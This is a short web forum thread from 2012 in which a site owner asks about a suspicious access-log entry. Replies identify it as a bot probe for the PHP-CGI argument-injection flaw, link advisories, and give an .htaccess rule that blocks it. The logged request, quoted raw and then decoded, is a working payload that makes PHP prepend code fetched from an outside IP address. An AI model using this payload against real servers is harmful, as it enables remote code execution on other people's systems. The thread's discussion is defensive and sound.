Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 5 of 5
  1. #1
    New to the CF scene
    Join Date
    Jun 2012
    Posts
    4
    Thanks
    1
    Thanked 0 Times in 0 Posts

    attack or webcrawler?

    209.135.33.180 - - [09/Jun/2012:07:45:11 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.1" 200 4129



    what is the nature of this request?

  • #2
    New Coder
    Join Date
    Nov 2011
    Posts
    88
    Thanks
    4
    Thanked 26 Times in 26 Posts
    Why would a legitimate crawler POST ?

    Looks like a bot testing for file inclusion vulnerabilities by linking to a gif on a Spanish server

    Code:
    /?-d allow_url_include=On+-d auto_prepend_file=http://84.20.17.144/sites/api.gif -n/?-d allow_url_include=On+-d auto_prepend_file=http://84.20.17.144/sites/api.gif -n
    Last edited by leslie.jones; 06-10-2012 at 12:47 PM. Reason: typo

  • #3
    New to the CF scene
    Join Date
    Jul 2012
    Posts
    7
    Thanks
    1
    Thanked 2 Times in 2 Posts
    I have also seen this in my access log file on my private webserver. Except the originating IP address was 174.123.131.34. Apparently coming from a web-account hosted by theplanet.com. I wonder if anyone else has seen this as well?

  • #4
    New Coder
    Join Date
    Nov 2011
    Posts
    88
    Thanks
    4
    Thanked 26 Times in 26 Posts
    It appears to relate to this PHP bug/vuln:

    http://eindbazen.net/2012/05/php-cgi...cve-2012-1823/

    This article

    http://blog.sucuri.net/2012/05/php-c...-the-wild.html

    suggests that:

    The PHP guys are recommending the following .htaccess hack to block those attacks:

    Code:
        RewriteEngine on
        RewriteCond %{QUERY_STRING} ^[^=]*$
        RewriteCond %{QUERY_STRING} %2d|\- [NC]
        RewriteRule .? – [F,L]
    ]
    If you don't use PHP-CGI, it's a non issue and part of the usual trash of reconnaissance a sysadmin gets to see in the logs.
    Last edited by leslie.jones; 07-09-2012 at 11:53 AM.

  • Users who have thanked leslie.jones for this post:

    kerigan (07-13-2012)

  • #5
    New to the CF scene
    Join Date
    Jul 2012
    Posts
    7
    Thanks
    1
    Thanked 2 Times in 2 Posts
    Thank you for the information. I wasn't aware of this bug.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •